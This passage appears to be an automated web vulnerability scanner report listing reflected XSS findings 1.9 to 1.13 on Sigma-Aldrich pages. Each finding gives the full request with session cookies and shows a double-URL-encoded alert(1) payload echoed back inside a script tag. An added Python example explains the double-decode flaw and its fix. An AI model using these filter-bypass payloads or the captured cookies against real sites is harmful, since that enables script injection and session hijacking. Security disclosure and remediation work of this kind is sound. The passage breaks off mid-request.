fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:00 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography5b7f8";alert(1)//9bb4c219a53/analytical-standards.html","E404") ;
   </script>
...[SNIP]...

1.9. http://www.sigmaaldrich.com/analytical-chromatography/analytical-standards.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/analytical-standards.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63839%2522%253balert%25281%2529%252f%252f742f80ae9ee was submitted in the REST URL parameter 2. This input was echoed as 63839";alert(1)//742f80ae9ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/63839%2522%253balert%25281%2529%252f%252f742f80ae9ee HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:02 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/63839";alert(1)//742f80ae9ee","E404") ;
   </script>
...[SNIP]...

1.10. http://www.sigmaaldrich.com/analytical-chromatography/catalog-request-form.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/catalog-request-form.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf604%2522%253balert%25281%2529%252f%252fe8aa16b1a71 was submitted in the REST URL parameter 1. This input was echoed as bf604";alert(1)//e8aa16b1a71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatographybf604%2522%253balert%25281%2529%252f%252fe8aa16b1a71/catalog-request-form.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:17 GMT
Content-Length: 28955
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatographybf604";alert(1)//e8aa16b1a71/catalog-request-form.html","E404") ;
   </script>
...[SNIP]...

1.11. http://www.sigmaaldrich.com/analytical-chromatography/catalog-request-form.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/catalog-request-form.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9aaca%2522%253balert%25281%2529%252f%252f8253fe91f2f was submitted in the REST URL parameter 2. This input was echoed as 9aaca";alert(1)//8253fe91f2f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
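The issue and remediation text above describe the same decode chain for every REST URL parameter finding in this report (1.10 through 1.17), so the mechanism is worth seeing once in code. The Python below is an added example, not code from the report or from the site under test. It models a server that URL-decodes the path once (as the web server does), runs a character blocklist on that once-decoded value, then decodes a second time before interpolating the result into the cmCreateErrorTag(...) string literal. The blocklist and the template string are assumptions reconstructed from the echoed response line; render_fixed shows the corrected pattern: decode exactly once, validate after that canonicalisation, and JavaScript-string-escape everything outside [A-Za-z0-9] so the value can neither close the literal nor form </script>.

```python
"""Model of the double-URL-decode flaw behind the REST URL parameter findings.

Added example, not code from the report or from the Sigma-Aldrich site. The
server-side template and the character blocklist are assumptions reconstructed
from the echoed cmCreateErrorTag(...) line in the 404 responses.
"""
from urllib.parse import unquote

# Payload exactly as submitted in finding 1.11 (REST URL parameter 2).
PAYLOAD = "9aaca%2522%253balert%25281%2529%252f%252f8253fe91f2f"
ORIGIN = "http://www.sigmaaldrich.com:4402"
BLOCKED = set('"<>\'')  # hypothetical blocklist applied after the first decode


def filter_passes(value: str) -> bool:
    """Hypothetical blocklist check run on the once-decoded path."""
    return not (BLOCKED & set(value))


def is_blocked(raw_path: str) -> bool:
    """Whether the filter catches a given raw request path after one decode."""
    return not filter_passes(unquote(raw_path))


def render_vulnerable(raw_path: str) -> str:
    """Web server decodes once, the filter runs, then the application decodes
    AGAIN and drops the result straight into a JavaScript string literal."""
    once = unquote(raw_path)        # web server: %2522 -> %22 (no '"' yet)
    if not filter_passes(once):     # the blocklist sees only '%22' and passes it
        raise ValueError("blocked by filter")
    twice = unquote(once)           # application: %22 -> '"'  (the bug)
    return f'cmCreateErrorTag("Error 404 | {ORIGIN}{twice}","E404") ;'


def js_string_escape(value: str) -> str:
    """Encode a value for a JS double-quoted literal inside <script>: every
    character outside [A-Za-z0-9] becomes \\uXXXX, so the output can never
    terminate the literal and never contains '</script' either."""
    return "".join(
        c if c.isascii() and c.isalnum() else f"\\u{ord(c):04x}" for c in value
    )


def render_fixed(raw_path: str) -> str:
    """Decode exactly once (the web server's decode is the canonical form),
    validate on that form if needed, then escape for the JS string context."""
    once = unquote(raw_path)
    # Any allow-list validation of `once` belongs here, after canonicalisation.
    return f'cmCreateErrorTag("Error 404 | {js_string_escape(ORIGIN + once)}","E404") ;'
```

render_vulnerable on the request path from finding 1.11 reproduces the echoed response line exactly, while render_fixed on the same input produces a literal containing only the four double quotes of the two constant arguments. HTML-entity encoding would not be a substitute here: inside a <script> block the HTML parser does not decode &quot;, so only JavaScript string escaping protects this context.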

Request

GET /analytical-chromatography/9aaca%2522%253balert%25281%2529%252f%252f8253fe91f2f HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:19 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/9aaca";alert(1)//8253fe91f2f","E404") ;
   </script>
...[SNIP]...

1.12. http://www.sigmaaldrich.com/analytical-chromatography/fluka-analytical/customware-oem.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/fluka-analytical/customware-oem.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b3d7%2522%253balert%25281%2529%252f%252f0b4b8116511 was submitted in the REST URL parameter 1. This input was echoed as 2b3d7";alert(1)//0b4b8116511 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography2b3d7%2522%253balert%25281%2529%252f%252f0b4b8116511/fluka-analytical/customware-oem.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:16 GMT
Content-Length: 28966
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography2b3d7";alert(1)//0b4b8116511/fluka-analytical/customware-oem.html","E404") ;
   </script>
...[SNIP]...

1.13. http://www.sigmaaldrich.com/analytical-chromatography/fluka-analytical/customware-oem.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/fluka-analytical/customware-oem.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64f3d%2522%253balert%25281%2529%252f%252f484e4ebf13c was submitted in the REST URL parameter 2. This input was echoed as 64f3d";alert(1)//484e4ebf13c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/fluka-analytical64f3d%2522%253balert%25281%2529%252f%252f484e4ebf13c/customware-oem.html HTTP/1.1
